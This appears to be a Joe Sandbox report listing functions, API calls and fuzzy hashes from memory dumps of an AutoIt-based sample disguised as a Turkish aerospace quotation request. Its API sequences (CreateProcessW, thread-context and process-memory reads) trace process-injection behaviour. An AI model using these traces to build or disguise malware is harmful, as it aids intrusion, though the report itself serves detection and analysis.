Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: e3e210f7e96a4c9535ef97233fcdd6199ff6d5187c1acb6aa90fc139e5edaa61
Instruction ID: f645ab7fb62081b450601af9c92d59d089620845a841928daf363891a614d561
Opcode Fuzzy Hash: e3e210f7e96a4c9535ef97233fcdd6199ff6d5187c1acb6aa90fc139e5edaa61
Instruction Fuzzy Hash: DFF0C23C90020D77CF05BAA4D846DAE7BAC5E56354B604135B828D6591EF71EA66C5C0

Function 001F3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 001F302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 001F3044

Strings

aut, xrefs: 001F3038

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 792370455209c0a8a7126c13ae87da06919120097a649cd0b2312782618fc97b
Instruction ID: cb9444f3c8ec030962250fec8ce7f11ca8a948da5447588fe088bb4d067c6162
Opcode Fuzzy Hash: 792370455209c0a8a7126c13ae87da06919120097a649cd0b2312782618fc97b
Instruction Fuzzy Hash: F9D05EB654032867DA20A7A4AC0EFCB3A6CDB05750F0002A1BA55E2091DEF09984CAD0

Function 00207F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 002082F5
TerminateProcess.KERNEL32(00000000), ref: 002082FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 002084DD

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 3c35440be6256abe78314e3bf96becc449b5af8a368c4beba56a2438b1000c38
Instruction ID: e50a5dfd4d0f83c4c7d16588bd01f3f683e7b20e2340acb491668746bcb98525
Opcode Fuzzy Hash: 3c35440be6256abe78314e3bf96becc449b5af8a368c4beba56a2438b1000c38
Instruction Fuzzy Hash: CF127A71A183419FD714DF28C484B2ABBE1BF88318F14895DE9898B392CB71ED45CF92

Function 001B5AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12bea9b11eb7487647b2c513f390eaaf2bf09a6b4c376845a59c0a3f132772e4
Instruction ID: 110e1cd0dae2fb01f25f05f4c33ae579b3ef4380ddf919088222468905b8ee2f
Opcode Fuzzy Hash: 12bea9b11eb7487647b2c513f390eaaf2bf09a6b4c376845a59c0a3f132772e4
Instruction Fuzzy Hash: 2A51B275D006099FCB25AFA4C949FEE7FBBAF19310F14005AF405A7292DB719A02CB61

Function 001810F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00181BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00181BF4
Part of subcall function 00181BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00181BFC
Part of subcall function 00181BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00181C07
Part of subcall function 00181BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00181C12
Part of subcall function 00181BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00181C1A
Part of subcall function 00181BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00181C22

Part of subcall function 00181B4A: RegisterWindowMessageW.USER32(00000004,?,001812C4), ref: 00181BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0018136A
OleInitialize.OLE32 ref: 00181388
CloseHandle.KERNEL32(00000000,00000000), ref: 001C24AB

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: e20a9c296256c621c7c67666ce675f628ce27761423e805313ff181921320318
Instruction ID: 1596beb70a1c319bb73b1813b160f54b632cd199743b8e7a7b5a2071385cc2a8
Opcode Fuzzy Hash: e20a9c296256c621c7c67666ce675f628ce27761423e805313ff181921320318
Instruction Fuzzy Hash: 7971B9B89213008FD794EF79B84D7A53AE4FBA8356794862AD40AC7361FB304965CF4C

Function 001EC161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00183923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00183A04

Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001EC259
KillTimer.USER32(?,00000001,?,?), ref: 001EC261
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001EC270

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 34fec0db483084be8106bd48e5fd04794c38866c97a22182ebf560fc1f5807d4
Instruction ID: a0e7b07300eaaae1ff68aead20e97504ad4ccb4e22c519cd31c14b4632427a30
Opcode Fuzzy Hash: 34fec0db483084be8106bd48e5fd04794c38866c97a22182ebf560fc1f5807d4
Instruction Fuzzy Hash: 3B31F770904784AFEB329F749C59BEBBBEC9F16304F00009DE2DA93241C7745A85CB91

Function 001B86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,001B85CC,?,00248CC8,0000000C), ref: 001B8704
GetLastError.KERNEL32(?,001B85CC,?,00248CC8,0000000C), ref: 001B870E
__dosmaperr.LIBCMT ref: 001B8739

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 3423356174fa86024f11608245a7980fc6900eac47478c56f42214b8921e1302
Instruction ID: 1bf734e5a8ed33a722751a23c9ea366c996cef7972d811155b6115a47abeb209
Opcode Fuzzy Hash: 3423356174fa86024f11608245a7980fc6900eac47478c56f42214b8921e1302
Instruction Fuzzy Hash: C6014E32A0572026D7647334B8497FE678E5BA2F78F390159F8188B2E2DFB0CC81C190

Function 0018DB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 0018DB7B
DispatchMessageW.USER32(?), ref: 0018DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0018DB9F
Sleep.KERNEL32(0000000A), ref: 0018DBB1
TranslateAcceleratorW.USER32(?,?,?), ref: 001D1CC9

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: dbdf228e04b504186638671ecf512008ef30585d5dd9597b73679d21355da00b
Instruction ID: 3f6c8a45e77d6b90b79bd0782d5363a334008bce66fc5bb7e96bd826f14b72ac
Opcode Fuzzy Hash: dbdf228e04b504186638671ecf512008ef30585d5dd9597b73679d21355da00b
Instruction Fuzzy Hash: ACF05E30654340ABEB30DBA0EC8DFEA73ADEB55311F104919E60A830C0DB709548CF15

Function 001F2FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,001F2CD4,?,?,?,00000004,00000001), ref: 001F2FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,001F2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 001F3006
CloseHandle.KERNEL32(00000000,?,001F2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 001F300D

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 67eb7a5143a9fbe4068e181819c16c7dfe2c9a967a3c194148acb6b80ef1918b
Instruction ID: a563204bb31112370b6ad6d243745e7ffae2bf2e0f7cbb61d4d6af69a093bfbd
Opcode Fuzzy Hash: 67eb7a5143a9fbe4068e181819c16c7dfe2c9a967a3c194148acb6b80ef1918b
Instruction Fuzzy Hash: 8CE086362C022477D2302755BC0DFDB3A1CD786B71F208210F729750D08AA1160142A8

Function 00191310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001917F6

Strings

CALL, xrefs: 001917C6

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 7ec765f5abfe806eada540dc2097613ff030899b5296f64bd5b33ff5acf0b541
Instruction ID: 48c34e577d85b15a934cba61c9bdc859e8176082a6e046cc3d2cea9e2d03c867
Opcode Fuzzy Hash: 7ec765f5abfe806eada540dc2097613ff030899b5296f64bd5b33ff5acf0b541
Instruction Fuzzy Hash: 35229C70608302EFDB18DF14C484A2ABBF1BF9A354F15891DF4968B3A1D771E985CB92

Function 001F6EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001F6F6B

Part of subcall function 00184ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00251418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00184EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 001F6F5A, 001F6F63

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: 5f31f279eb7cfd25b6f851377cfc0aad011644d971825d9238c5f76d4719a2ac
Instruction ID: 4b824498c021aec97e7fd94954e21c7bcc475254dace1c25f757aef4f944ae0c
Opcode Fuzzy Hash: 5f31f279eb7cfd25b6f851377cfc0aad011644d971825d9238c5f76d4719a2ac
Instruction Fuzzy Hash: 35B17B311082058FDB14FF24D49197EB7E5AFA5304F14891DF596972A2EB30EE49CF92

Function 001F2557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 001F2587

Strings

EA06, xrefs: 001F25B9

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: 2a70b549952080cc169fcb9d02272a7ee336f4bfbd6c2429af1396c4eb744d7a
Instruction ID: 6fa59ff03694cf0773118b292c588af7869b42913ee0ef5eb34e6f0dfeccd1ff
Opcode Fuzzy Hash: 2a70b549952080cc169fcb9d02272a7ee336f4bfbd6c2429af1396c4eb744d7a
Instruction Fuzzy Hash: A801B5729042587EDF19C7A8C856EFEBBF8DB16305F00455AE152D2181E5B8E6188B60

Function 0189FA75 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 018A02A5
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 018A02C9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018A02EB

Memory Dump Source

Source File: 00000000.00000002.1456313180.000000000189E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0189E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_189e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
Instruction ID: b9c5541e3955cd0b7e27a5151e9de327c1a098d1494637f2e42922c620d89281
Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
Instruction Fuzzy Hash: 5612CD24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F91CF5A

Function 0019FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0019FD1F

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 599476efce21f3b7bb84fabd58d13365b2df59dfe36e8639d24e86f055e47f7b
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 9131E275A00109EBCB18CF99D480969FBA6FF49310B25C6A9E809CF656D731EDC2DBC0

Function 00184ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00184E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00184EDD,?,00251418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00184E9C
Part of subcall function 00184E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00184EAE
Part of subcall function 00184E90: FreeLibrary.KERNEL32(00000000,?,?,00184EDD,?,00251418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00184EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00251418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00184EFD

Part of subcall function 00184E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,001C3CDE,?,00251418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00184E62
Part of subcall function 00184E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00184E74
Part of subcall function 00184E59: FreeLibrary.KERNEL32(00000000,?,?,001C3CDE,?,00251418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00184E87

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 938e72ec4c135c282b47e7b108065d5bd37b4fa9b29b4f3142618a05f0a8ac27
Instruction ID: 9e4550dfb12180463ed835a597b1f6152df625e629d4671cae261f95c0958052
Opcode Fuzzy Hash: 938e72ec4c135c282b47e7b108065d5bd37b4fa9b29b4f3142618a05f0a8ac27
Instruction Fuzzy Hash: 8411E336610206ABDB14BF64DC06FAD77A5AF60714F20842EF642A61C1EF749B459F90

Function 001B8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 001B8440

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: f460d2ef318a9d58d543c730763801fc6e037b515775359371c5a5d4216a4876
Instruction ID: 854ff2c4cfe976564017ec621e201de0045eef3eabf8d1667e036f5032524734
Opcode Fuzzy Hash: f460d2ef318a9d58d543c730763801fc6e037b515775359371c5a5d4216a4876
Instruction Fuzzy Hash: 3111187590420AAFCF05DF58E941ADA7BF9EF48314F114059FC08AB312DB31EA11CBA5

Function 001B5000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001B4C7D: RtlAllocateHeap.NTDLL(00000008,00181129,00000000,?,001B2E29,00000001,00000364,?,?,?,001AF2DE,001B3863,00251444,?,0019FDF5,?), ref: 001B4CBE

_free.LIBCMT ref: 001B506C

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: c5a519e1ae7e946769c3463ca52734648b216519c298bf1f258fb3afc8b01407
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: D70126722047056BE3219F65D881A9AFBE9FB89370F25051DF19483280EB30A805C6B4

Function 001AE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
